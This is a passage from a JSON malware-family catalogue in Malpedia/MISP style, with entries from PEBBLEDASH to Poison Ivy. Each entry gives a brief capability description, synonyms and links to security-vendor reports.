"https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c", "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", "https://blog.reversinglabs.com/blog/hidden-cobra" ], "synonyms": [], "type": [] }, "uuid": "d6da9699-778c-4c97-82f4-1e9113283bd4", "value": "PEBBLEDASH" }, { "description": "PeddleCheap is a module of the DanderSpritz framework which surface with the \"Lost in Translation\" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap", "https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#", "https://twitter.com/ESETresearch/status/1258353960781598721", "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/" ], "synonyms": [], "type": [] }, "uuid": "ee450087-00e4-4b59-9ea7-6650d5551ea9", "value": "PeddleCheap" }, { "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", "value": "Peepy RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut", "https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing" ], "synonyms": [], "type": [] }, "uuid": "88f636b9-9c2e-4faf-ab83-b91009bf47fc", "value": "Pekraut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" ], "synonyms": [], "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", "value": "Penco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", "value": "PetrWrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", "value": "Petya" }, { "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift" ], "synonyms": [ "ReRol" ], "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", "value": "pgift" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c", "value": "PhanDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware" ], "synonyms": [], "type": [] }, "uuid": "d061daca-4415-4b3e-9034-231e37857eed", "value": "Phobos Ransomware" }, { "description": "Keylogger, information stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger", "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger" ], "synonyms": [], "type": [] }, "uuid": "601ea680-68ec-43c9-ba20-88eaaefe8818", "value": "Phoenix Keylogger" }, { "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" ], "synonyms": [ "Rizzo" ], "type": [] }, "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b", "value": "PHOREAL" }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", "https://research.checkpoint.com/2019/phorpiex-breakdown/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" ], "synonyms": [ "Trik" ], "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, { "description": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] }, "uuid": "2eb298de-e14b-46c1-a45f-26ae0d2c4003", "value": "PICKPOCKET" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi", "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" ], "synonyms": [], "type": [] }, "uuid": "2bda00e8-e6a7-448d-8dfa-4f2276230e8b", "value": "Pierogi" }, { "description": "According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory.\r\n Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged)\r\n Contains additional backdoor capabilities including:\r\n Running processes\r\n Downloading and executing files (T1105: Remote File Copy)\r\n Downloading and injecting DLLs (T1055: Process Injection)\r\n Communicates with a command and control (C2) server over HTTP using AES encrypted messages\r\n (T1071: Standard Application Layer Protocol)\r\n (T1032: Standard Cryptographic Protocol)\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" ], "synonyms": [], "type": [] }, "uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38", "value": "PILLOWMINT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" ], "synonyms": [], "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", "value": "pipcreat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [ "CookieCutter", "SHOTPUT" ], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", "value": "pirpi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://isc.sans.edu/diary/rss/25068", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://johannesbader.ch/2019/07/the-dga-of-pitou/" ], "synonyms": [], "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", "value": "Pitou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" ], "synonyms": [], "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", "value": "PittyTiger RAT" }, { "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ "Bublik", "Pykbot", "TBag" ], "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", "value": "Pkybot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", "value": "PLAINTEE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" ], "synonyms": [], "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", "value": "playwork" }, { "description": "PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html", "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", "http://www.freebuf.com/column/159865.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/" ], "synonyms": [ "DRAWDOWN", "GOODTIMES", "Linopid" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", "value": "PLEAD (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html", "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", "value": "Ploutus ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", "value": "ployx" }, { "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://community.rsa.com/thread/185439", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-olive", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.secureworks.com/research/bronze-president-targets-ngos", "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "https://blog.ensilo.com/uncovering-new-activity-by-apt10", "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.macnica.net/file/security_report_20160613.pdf", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://www.secureworks.com/research/threat-profiles/bronze-woodland", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.contextis.com/de/blog/avivore", "https://www.us-cert.gov/ncas/alerts/TA17-117A", "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://twitter.com/stvemillertime/status/1261263000960450562", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", "https://risky.biz/whatiswinnti/", "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", "https://www.secureworks.com/research/threat-profiles/bronze-president" ], "synonyms": [ "Destroy RAT", "Kaba", "Korplug", "Sogu", "TIGERPLUG" ], "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox", "https://securelist.com/plurox-modular-backdoor/91213/", "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html" ], "synonyms": [], "type": [] }, "uuid": "6c8b94fc-f2d4-4347-aa49-4e6daac74314", "value": "Plurox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" ], "synonyms": [], "type": [] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, { "description": "uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown", "https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html", "https://twitter.com/cyb3rops/status/1129653190444703744", "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html" ], "synonyms": [ "Blitz", "PocoDownloader" ], "type": [] }, "uuid": "25804d6d-447f-4933-9ba0-876f9d054b68", "value": "PocoDown" }, { "description": "According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug", "https://content.fireeye.com/apt-41/rpt-apt41/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "Barlaiy" ], "type": [] }, "uuid": "3b1c7856-5158-418c-90ad-afda67a66963", "value": "poisonplug" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://community.riskiq.com/article/56fa1b2f", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", 